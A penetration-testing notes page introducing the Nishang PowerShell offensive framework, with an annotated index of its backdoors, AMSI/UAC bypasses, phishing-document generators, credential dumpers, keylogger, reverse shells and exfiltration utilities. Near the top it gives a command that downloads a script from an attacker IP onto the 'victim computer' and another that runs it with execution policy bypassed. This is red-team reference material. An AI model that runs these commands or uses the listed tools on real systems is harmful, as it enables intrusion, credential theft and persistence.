# Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

**Link**: <https://github.com/samratashok/nishang>&#x20;

Also installed by default on Kali:&#x20;

```
root@kali:~# ls -l /usr/share/nishang/ 
total 48 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Antak-WebShell 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Backdoors 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Escalation 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Execution 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Gather 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Misc 
-rw-r--r-- 1 root root  495 Jun  4 11:14 nishang.psm1 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Pivot 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 powerpreter 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Prasadhak 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Scan 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Utility 
```

We will need to upload the nishang scripts into the victim computer:&#x20;

`powershell iwr -uri 10.10.14.14/{Nishang script}` &#x20;

Load the script:&#x20;

`powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1`&#x20;

## Scripts&#x20;

Nishang currently contains the following scripts and payloads.&#x20;

### ActiveDirectory&#x20;

* [Get-Unconstrained](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Get-Unconstrained.ps1) – Find computers in active directory which have Kerberos Unconstrained Delegation enabled.&#x20;

### Antak – the Webshell&#x20;

* [Antak](https://github.com/samratashok/nishang/tree/master/Antak-WebShell) – Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.&#x20;

### Backdoors&#x20;

* [HTTP-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/HTTP-Backdoor.ps1) – A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.&#x20;
* [DNS\_TXT\_Pwnage](https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1) – A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.&#x20;
* [Execute-OnTime](https://github.com/samratashok/nishang/blob/master/Backdoors/Execute-OnTime.ps1) – A backdoor which can execute PowerShell scripts at a given time on a target.&#x20;
* [Gupt-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Gupt-Backdoor.ps1) – A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.&#x20;
* [Add-ScrnSaveBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-ScrnSaveBackdoor.ps1) – A backdoor which can use Windows screen saver for remote command and script execution.&#x20;
* [Invoke-ADSBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1) – A backdoor which can use alternate data streams and Windows Registry to achieve persistence.&#x20;
* [Add-RegBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-RegBackdoor.ps1) – A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).&#x20;
* [Set-RemoteWMI](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1) – Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.&#x20;
* [Set-RemotePSRemoting](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1) – Modify permissions of PowerShell remoting to allow access to a non-admin user.&#x20;

### Bypass&#x20;

* [Invoke-AmsiBypass](https://github.com/samratashok/nishang/blob/master/Bypass/Invoke-AmsiBypass.ps1) – Implementation of publicly known methods to bypass/avoid AMSI.&#x20;

### Client&#x20;

* [Out-CHM](https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1) – Create infected CHM files which can execute PowerShell commands and scripts.&#x20;
* [Out-Word](https://github.com/samratashok/nishang/blob/master/Client/Out-Word.ps1) – Create Word files and infect existing ones to run PowerShell commands and scripts.&#x20;
* [Out-Excel](https://github.com/samratashok/nishang/blob/master/Client/Out-Excel.ps1) – Create Excel files and infect existing ones to run PowerShell commands and scripts.&#x20;
* [Out-HTA](https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1) – Create a HTA file which can be deployed on a web server and used in phishing campaigns.&#x20;
* [Out-Java](https://github.com/samratashok/nishang/blob/master/Client/Out-Java.ps1) – Create signed JAR files which can be used with applets for script and command execution.&#x20;
* [Out-Shortcut](https://github.com/samratashok/nishang/blob/master/Client/Out-Shortcut.ps1) – Create shortcut files capable of executing PowerShell commands and scripts.&#x20;
* [Out-WebQuery](https://github.com/samratashok/nishang/blob/master/Client/Out-WebQuery.ps1) – Create IQY files for phishing credentials and SMB hashes.&#x20;
* [Out-JS](https://github.com/samratashok/nishang/blob/master/Client/Out-JS.ps1) – Create JS files capable of executing PowerShell commands and scripts.&#x20;
* [Out-SCT](https://github.com/samratashok/nishang/blob/master/Client/Out-SCT.ps1) – Create SCT files capable of executing PowerShell commands and scripts.&#x20;
* [Out-SCF](https://github.com/samratashok/nishang/blob/master/Client/Out-SCF.ps1) – Create a SCF file which can be used for capturing NTLM hash challenges.&#x20;

### Escalation&#x20;

* [Enable-DuplicateToken](https://github.com/samratashok/nishang/blob/master/Escalation/Enable-DuplicateToken.ps1) – When SYSTEM privileges are required.&#x20;
* [Remove-Update](https://github.com/samratashok/nishang/blob/master/Escalation/Remove-Update.ps1) – Introduce vulnerabilities by removing patches.&#x20;
* [Invoke-PsUACme](https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1) – Bypass UAC.&#x20;

### Execution&#x20;

* [Download-Execute-PS](https://github.com/samratashok/nishang/blob/master/Execution/Download-Execute-PS.ps1) – Download and execute a PowerShell script in memory.&#x20;
* [Download\_Execute](https://github.com/samratashok/nishang/blob/master/Execution/Download_Execute.ps1) – Download an executable in text format, convert it to an executable, and execute.&#x20;
* [Execute-Command-MSSQL](https://github.com/samratashok/nishang/blob/master/Execution/Execute-Command-MSSQL.ps1) – Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.&#x20;
* [Execute-DNSTXT-Code](https://github.com/samratashok/nishang/blob/master/Execution/Execute-DNSTXT-Code.ps1) – Execute shellcode in memory using DNS TXT queries.&#x20;
* [Out-RundllCommand](https://github.com/samratashok/nishang/blob/master/Execution/Out-RundllCommand.ps1) – Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.&#x20;

### Gather&#x20;

* [Check-VM](https://github.com/samratashok/nishang/blob/master/Gather/Check-VM.ps1) – Check for a virtual machine.&#x20;
* [Copy-VSS](https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1) – Copy the SAM file using Volume Shadow Copy Service.&#x20;
* [Invoke-CredentialsPhish](https://github.com/samratashok/nishang/blob/master/Gather/Credentials.ps1) – Trick a user into giving credentials in plain text.&#x20;
* [FireBuster](https://github.com/samratashok/nishang/blob/master/Gather/FireBuster.ps1) [FireListener](https://github.com/samratashok/nishang/blob/master/Gather/FireListener.ps1) – A pair of scripts for egress testing&#x20;
* [Get-Information](https://github.com/samratashok/nishang/blob/master/Gather/Get-Information.ps1) – Get juicy information from a target.&#x20;
* [Get-LSASecret](https://github.com/samratashok/nishang/blob/master/Gather/Get-LSASecret.ps1) – Get LSA Secret from a target.&#x20;
* [Get-PassHashes](https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1) – Get password hashes from a target.&#x20;
* [Get-WLAN-Keys](https://github.com/samratashok/nishang/blob/master/Gather/Get-WLAN-Keys.ps1) – Get WLAN keys in plain text from a target.&#x20;
* [Keylogger](https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1) – Log keystrokes from a target.&#x20;
* [Invoke-MimikatzWdigestDowngrade](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-MimikatzWDigestDowngrade.ps1) – Dump user passwords in plain on Windows 8.1 and Server 2012&#x20;
* [Get-PassHints](https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHints.ps1) – Get password hints of Windows users from a target.&#x20;
* [Show-TargetScreen](https://github.com/samratashok/nishang/blob/master/Gather/Show-TargetScreen.ps1) – Connect back and Stream target screen using MJPEG.&#x20;
* [Invoke-Mimikatz](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1) – Load mimikatz in memory. Updated and with some customisation.&#x20;
* [Invoke-Mimikittenz](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikittenz.ps1) – Extract juicy information from target process (like browsers) memory using regex.&#x20;
* [Invoke-SSIDExfil](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-SSIDExfil.ps1) – Exfiltrate information like user credentials, using WLAN SSID.&#x20;
* [Invoke-SessionGopher](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-SessionGopher.ps1) – Identify admin jump-boxes and/or computers used to access Unix machines.&#x20;

### MITM&#x20;

* [Invoke-Interceptor](https://github.com/samratashok/nishang/blob/master/MITM/Invoke-Interceptor.ps1) – A local HTTPS proxy for MITM attacks. =

### Pivot&#x20;

* [Create-MultipleSessions](https://github.com/samratashok/nishang/blob/master/Pivot/Create-MultipleSessions.ps1) – Check credentials on multiple computers and create PSSessions.&#x20;
* [Run-EXEonRemote](https://github.com/samratashok/nishang/blob/master/Pivot/Run-EXEonRemote.ps1)  – Copy and execute an executable on multiple machines.&#x20;
* [Invoke-NetworkRelay](https://github.com/samratashok/nishang/blob/master/Pivot/Invoke-NetworkRelay.ps1)  – Create network relays between computers.&#x20;

### Prasadhak&#x20;

* [Prasadhak](https://github.com/samratashok/nishang/blob/master/Prasadhak/Prasadhak.ps1) – Check running hashes of running process against the VirusTotal database.&#x20;

### Scan&#x20;

* [Brute-Force](https://github.com/samratashok/nishang/blob/master/Scan/Brute-Force.ps1) – Brute force FTP, Active Directory, MSSQL, and Sharepoint.&#x20;
* [Port-Scan](https://github.com/samratashok/nishang/blob/master/Scan/Port-Scan.ps1) – A handy port scanner.&#x20;

### Powerpreter&#x20;

* [Powerpreter](https://github.com/samratashok/nishang/tree/master/powerpreter) – All the functionality of nishang in a single script module.&#x20;

### Shells&#x20;

* [Invoke-PsGcat](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PsGcat.ps1) – Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent&#x20;
* [Invoke-PsGcatAgent](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PsGcatAgent.ps1) – Execute commands and scripts sent by Invoke-PsGcat.&#x20;
* [Invoke-PowerShellTcp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) – An interactive PowerShell reverse connect or bind shell&#x20;
* [Invoke-PowerShellTcpOneLine](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1) – Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.&#x20;
* [Invoke-PowerShellTcpOneLineBind](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLineBind.ps1) – Bind version of Invoke-PowerShellTcpOneLine.&#x20;
* [Invoke-PowerShellUdp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellUdp.ps1) – An interactive PowerShell reverse connect or bind shell over UDP&#x20;
* [Invoke-PowerShellUdpOneLine](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellUdpOneLine.ps1) – Stripped down version of Invoke-PowerShellUdp.&#x20;
* [Invoke-PoshRatHttps](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttps.ps1) – Reverse interactive PowerShell over HTTPS.&#x20;
* [Invoke-PoshRatHttp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttp.ps1) – Reverse interactive PowerShell over HTTP.&#x20;
* [Remove-PoshRat](https://github.com/samratashok/nishang/blob/master/Shells/Remove-PoshRat.ps1) – Clean the system after using Invoke-PoshRatHttps&#x20;
* [Invoke-PowerShellWmi](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellWmi.ps1) – Interactive PowerShell using WMI.&#x20;
* [Invoke-PowerShellIcmp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1) – An interactive PowerShell reverse shell over ICMP.&#x20;
* [Invoke-JSRatRundll](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRundll.ps1) – An interactive PowerShell reverse shell over HTTP using rundll32.exe.&#x20;
* [Invoke-JSRatRegsvr](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRegsvr.ps1) – An interactive PowerShell reverse shell over HTTP using regsvr32.exe.&#x20;

### Utility&#x20;

* [Add-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Add-Exfiltration.ps1) – Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.&#x20;
* [Add-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Add-Persistence.ps1) – Add reboot persistence capability to a script.&#x20;
* [Remove-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Remove-Persistence.ps1) – Remote persistence added by the Add-Persistence script.&#x20;
* [Do-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Do-Exfiltration.ps1) – Pipe (|) this to any script to exfiltrate the output.&#x20;
* [Download](https://github.com/samratashok/nishang/blob/master/Utility/Download.ps1) – Transfer a file to the target.&#x20;
* [Parse\_Keys](https://github.com/samratashok/nishang/blob/master/Utility/Parse_Keys.ps1) – Parse keys logged by the keylogger.&#x20;
* [Invoke-Encode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1) – Encode and compress a script or string.&#x20;
* [Invoke-Decode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1) – Decode and decompress a script or string from Invoke-Encode.&#x20;
* [Start-CaptureServer](https://github.com/samratashok/nishang/blob/master/Utility/Start-CaptureServer.ps1) – Run a web server which logs Basic authentication and SMB hashes.&#x20;
* [ConvertTo-ROT13](https://github.com/samratashok/nishang/blob/master/Utility/ConvertTo-ROT13.ps1) – Encode a string to ROT13 or decode a ROT13 string.&#x20;
* [Out-DnsTxt](https://github.com/samratashok/nishang/blob/master/Utility/Out-DnsTxt.ps1) – Generate DNS TXT records which could be used with other scripts.&#x20;